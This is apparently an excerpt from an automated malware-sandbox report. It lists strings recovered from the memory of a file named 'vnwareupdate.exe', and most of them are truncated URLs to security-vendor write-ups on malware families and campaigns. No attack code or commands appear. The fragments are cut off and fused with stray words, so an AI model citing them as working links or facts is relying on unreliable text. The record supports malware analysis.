Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-researcryWannaCry
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-researctoWannaCry
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-researctyWannaCry
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-researcwrWannaCry
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-researczaWannaCry
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/open-threat-ex
Source: vnwareupdate.exe, 00000003.00000002.552214471.0000000003DA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/open-threat-ex.
Source: vnwareupdate.exe, 00000003.00000002.551768875.0000000003D61000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/open-threat-ex.0
Source: vnwareupdate.exe, 00000003.00000002.551768875.0000000003D61000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/open-threat-ex.P
Source: vnwareupdate.exe, 00000003.00000002.551768875.0000000003D61000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/open-threat-ex.p
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/open-threat-ex/Operation
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/open-threat-ex1Operation
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/open-threat-ex2Operation
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/open-threat-ex5
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/open-threat-ex7Operation
Source: vnwareupdate.exe, 00000003.00000003.236780975.00000000062F3000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.551768875.0000000003D61000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/open-threat-ex8
Source: vnwareupdate.exe, 00000003.00000003.233493320.0000000006353000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/open-threat-ex807
Source: vnwareupdate.exe, 00000003.00000003.233493320.0000000006353000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/open-threat-ex88
Source: vnwareupdate.exe, 00000003.00000003.236780975.00000000062F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/open-threat-ex8P5
Source: vnwareupdate.exe, 00000003.00000003.233493320.0000000006353000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/open-threat-ex8p6
Source: vnwareupdate.exe, 00000003.00000003.236780975.00000000062F3000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.233493320.0000000006353000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/open-threat-exConference
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/open-threat-exDragonOK
Source: vnwareupdate.exe, 00000003.00000002.552214471.0000000003DA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/open-threat-exMusical
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/open-threat-exOperation
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/open-threat-exYiSpecter:
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/open-threat-exeOperation
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/open-threat-exiOperation
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/open-threat-exmOperation
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/open-threat-exoOperation
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/open-threat-extOperation
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/open-threat-exyOperation
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/additional-insights-shamoon2/
Source: vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/another-banker-enters-matrix/WannaCry
Source: vnwareupdate.exe, 00000003.00000003.241827224.0000000005711000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/dirtjumpers-ddos-engine-gets-a-tune-up-
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/dirtjumpers-ddos-engine-gets-a-tune-up-From
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/dirtjumpers-ddos-engine-gets-a-tune-up-ckCommunities
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/dirtjumpers-ddos-engine-gets-a-tune-up-kCommunities
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/flokibot-invades-pos-trouble-brazil/
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/flokibot-invades-pos-trouble-brazil/Digital
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/flokibot-invades-pos-trouble-brazil/Flokibot
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/flokibot-invades-pos-trouble-brazil/Unit
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/flokibot-invades-pos-trouble-brazil/XAgentOSX:
Source: vnwareupdate.exe, 00000003.00000003.245681490.0000000003AE7000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/Sofacys
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/The
Source: vnwareupdate.exe, 00000003.00000003.241827224.0000000005711000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/greenbugs-dns-isms/
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/greenbugs-dns-isms/8
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/greenbugs-dns-isms/Full
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/greenbugs-dns-isms/Gryphon
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/
Source: vnwareupdate.exe, 00000003.00000003.233668995.0000000005DB3000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/recent-poison-iv/
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/the-revolution-will-be-written-in-delph
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/the-revolution-will-be-written-in-delphAsruex:
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/the-revolution-will-be-written-in-delphThe
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/wp-content/uploads/2014/06/ASERT-Threat
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/wp-content/uploads/2014/06/ASERT-ThreatEmbassy
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/wp-content/uploads/2014/06/ASERT-ThreatH
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/wp-content/uploads/2014/06/ASERT-ThreatHpW
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/wp-content/uploads/2014/06/ASERT-ThreatIlluminating
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/wp-content/uploads/2014/06/ASERT-ThreatNew
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/wp-content/uploads/2014/06/ASERT-ThreatPlugX
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/wp-content/uploads/2014/06/ASERT-ThreatRetefe
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/wp-content/uploads/2014/06/ASERT-ThreatSecond
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/wp-content/uploads/2014/06/ASERT-ThreatUpdated
Source: vnwareupdate.exe, 00000003.00000003.241994796.0000000005651000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/11/TLP-WHITE-Fl
Source: vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/11/TLP-WHITE-FlFastPOS
Source: vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/11/TLP-WHITE-FlFlying
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&tn=baidu&wd=ip138
Source: vnwareupdate.exe, 00000003.00000003.235905498.0000000005FB3000.00000004.00000001.sdmp	String found in binary or memory: https://www.blackhat.com/docs/us-15/materials/us-15-Peterson-GameOver-Zeus-Badgu
Source: vnwareupdate.exe, 00000003.00000003.245916145.0000000003967000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237713875.0000000003967000.00000004.00000001.sdmp	String found in binary or memory: https://www.bleepingcomputer.com/news/security/adware-bundle-adds-persistence-to
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.bleepingcomputer.com/news/security/adware-bundle-adds-persistence-to26Cobalt
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp	String found in binary or memory: https://www.bleepingcomputer.com/news/security/new-ghostadmin-malware-used-for-d
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-uk
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-ukEvolution
Source: vnwareupdate.exe, 00000003.00000003.242046472.00000000055D1000.00000004.00000001.sdmp	String found in binary or memory: https://www.bleepingcomputer.com/news/security/reyptson-ransomware-spams-your-fr
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: https://www.bluecoat.com/en-gb/security-blog/2015-01-20/reversing-inception-apt-
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: https://www.bluecoat.com/security-blog/2013-11-25/plugx-used-against-mongolian-t
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.bluecoat.com/security-blog/2013-11-25/plugx-used-against-mongolian-tPlugX
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.bluecoat.com/security-blog/2013-11-25/plugx-used-against-mongolian-tPowerSniff
Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.bluecoat.com/security-blog/2015-04-09/visual-basic-script-malware-re
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.bluecoat.com/security-blog/2015-04-09/visual-basic-script-malware-rePotential
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.bluecoat.com/security-blog/2015-04-09/visual-basic-script-malware-reRTF
Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.bluecoat.com/security-blog/2015-08-21/tinted-cve-decoy-spearphising-
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.bluecoat.com/security-blog/2015-08-21/tinted-cve-decoy-spearphising-KeyRaider:
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.bluecoat.com/security-blog/2015-08-21/tinted-cve-decoy-spearphising-Spearphising
Source: vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	String found in binary or memory: https://www.blueliv.com
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.blueliv.comAPTnotes
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.blueliv.comEvilBunny
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237233008.00000000036C1000.00000004.00000001.sdmp	String found in binary or memory: https://www.blueliv.comFidelis
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.blueliv.comPincav
Source: vnwareupdate.exe, 00000003.00000003.241572242.0000000005911000.00000004.00000001.sdmp	String found in binary or memory: https://www.carbonblack.com/2017/03/15/attackers-leverage-excel-powershell-dns-l
Source: vnwareupdate.exe, 00000003.00000003.245681490.0000000003AE7000.00000004.00000001.sdmp	String found in binary or memory: https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/Fiesta
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.cert.pl/en/news/single/ramnit-in-depth-analysis///Ramnit
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.cert.pl/en/news/single/ramnit-in-depth-analysis//LRamnit
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/05Ramnit
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/15Ramnit
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/63Ramnit
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/7dSWIFT
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/Ramnit
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/a3Ramnit
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/beRamnit
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/s
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://www.cert.pl/en/news/single/tofsee-en/
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://www.cert.pl/en/news/single/tofsee-en/Cat
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://www.cert.pl/en/news/single/tofsee-en/Tofsee
Source: vnwareupdate.exe, 00000003.00000002.516989975.00000000021F1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.245318104.0000000003B27000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.245791168.00000000039A7000.00000004.00000001.sdmp	String found in binary or memory: https://www.ci-project.org/blog/2017/10/1/h8ybw9lv70jigavhu46dexrlrhmow2
Source: vnwareupdate.exe, 00000003.00000003.245855228.00000000039E7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://www.ci-project.org/blog/2017/9/11/incident-report-recent-incident-report
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: https://www.ci-project.org/blog/2017/9/11/incident-report-recent-incident-reportAnalysis
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: https://www.ci-project.org/blog/2017/9/11/incident-report-recent-incident-reportH
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: https://www.ci-project.org/blog/2017/9/11/incident-report-recent-incident-reportRecent
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: https://www.circl.lu/pub/tr-25/
Source: vnwareupdate.exe, 00000003.00000003.242072217.0000000005511000.00000004.00000001.sdmp	String found in binary or memory: https://www.contextis.com/documents/30/TA10009_20140127_-_CTI_Threat_Advisory_-_
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.contextis.com/documents/30/TA10009_20140127_-_CTI_Threat_Advisory_-_Communities
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: https://www.contextis.com/documents/30/TA10009_20140127_-_CTI_Threat_Advisory_-_The
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-commi
Source: vnwareupdate.exe, 00000003.00000003.241469453.0000000005A11000.00000004.00000001.sdmp	String found in binary or memory: https://www.crowdstrike.com/blog/danger-close-fancy-bear-tracking-ukrainian-fiel
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.crowdstrike.com/blog/danger-close-fancy-bear-tracking-ukrainian-fielSednit
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.235905498.0000000005FB3000.00000004.00000001.sdmp	String found in binary or memory: https://www.crowdstrike.com/blog/french-connection-french-aerospace-focused-cve-
Source: vnwareupdate.exe, 00000003.00000003.236671866.0000000005A91000.00000004.00000001.sdmp	String found in binary or memory: https://www.crysys.hu/skywiper/skywiper.pdf
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.crysys.hu/skywiper/skywiper.pdfTargeted
Source: vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	String found in binary or memory: https://www.csis.dk/en/csis/blog/4628/
Source: vnwareupdate.exe, 00000003.00000003.241572242.0000000005911000.00000004.00000001.sdmp	String found in binary or memory: https://www.cyberscoop.com/chipotle-hack-fin7-carbanak-baja-fresh-ruby-tuesday/
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://www.cylance.com/en_us/blog/baijiu.html
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://www.cylance.com/en_us/blog/baijiu.htmlBAIJIU:
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://www.cylance.com/en_us/blog/baijiu.htmlIOCS
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.El
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.Malspam
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp	String found in binary or memory: https://www.cylance.com/en_us/blog/rawpos-malware.html
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://www.cylance.com/en_us/blog/rawpos-malware.htmlHikit
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://www.cylance.com/en_us/blog/rawpos-malware.htmlRawPOS
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.cylance.com/en_us/blog/threat-spotlight-konni-stealthy-remote-access
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.cylance.com/en_us/blog/threat-spotlight-konni-stealthy-remote-accessKONNI
Source: vnwareupdate.exe, 00000003.00000003.245681490.0000000003AE7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: https://www.cylance.com/en_us/blog/threat-spotlight-opening-hackers-door.html
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.cylance.com/en_us/blog/threat-spotlight-opening-hackers-door.htmlHkdoor
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.cylance.com/en_us/blog/threat-spotlight-opening-hackers-door.htmliSamSam
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malwareIlluminating
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: https://www.cylance.com/hubfs/2015_cylance_website/assets/operation-dust-storm/O
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://www.cylance.com/hubfs/2015_cylance_website/assets/operation-dust-storm/OOSX/Dok
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://www.cylance.com/hubfs/2015_cylance_website/assets/operation-dust-storm/OOperation
Source: vnwareupdate.exe, 00000003.00000003.237953574.0000000003A27000.00000004.00000001.sdmp	String found in binary or memory: https://www.cylance.com/operation-cleaver-the-notepad-files
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://www.cylance.com/operation-cleaver-the-notepad-filesPoS
Source: vnwareupdate.exe, 00000003.00000003.245318104.0000000003B27000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.242072217.0000000005511000.00000004.00000001.sdmp	String found in binary or memory: https://www.cyphort.com/eternalblue-exploit-actively-used-deliver-remote-access-
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.cyphort.com/eternalblue-exploit-actively-used-deliver-remote-access-EternalBlue
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.cyphort.com/eternalblue-exploit-actively-used-deliver-remote-access-KingKong.dll
Source: vnwareupdate.exe, 00000003.00000003.241827224.0000000005711000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.242046472.00000000055D1000.00000004.00000001.sdmp	String found in binary or memory: https://www.cyphort.com/samba
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://www.cyphort.com/sambaOops
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://www.cyphort.com/sambaSamba
Source: vnwareupdate.exe, 00000003.00000003.235905498.0000000005FB3000.00000004.00000001.sdmp	String found in binary or memory: https://www.damballa.com/corebot-and-darknet/
Source: vnwareupdate.exe, 00000003.00000003.234268201.0000000006033000.00000004.00000001.sdmp	String found in binary or memory: https://www.damballa.com/wp-content/uploads/2015/08/Damballa_PonyUp.pdf
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: https://www.dshield.org/forums/diary/Example
Source: vnwareupdate.exe, 00000003.00000003.237953574.0000000003A27000.00000004.00000001.sdmp	String found in binary or memory: https://www.easyaq.com/news/271075408.shtml
Source: vnwareupdate.exe, 00000003.00000003.235905498.0000000005FB3000.00000004.00000001.sdmp	String found in binary or memory: https://www.eff.org/deeplinks/2015/08/new-spear-phishing-campaign-pretends-be-ef
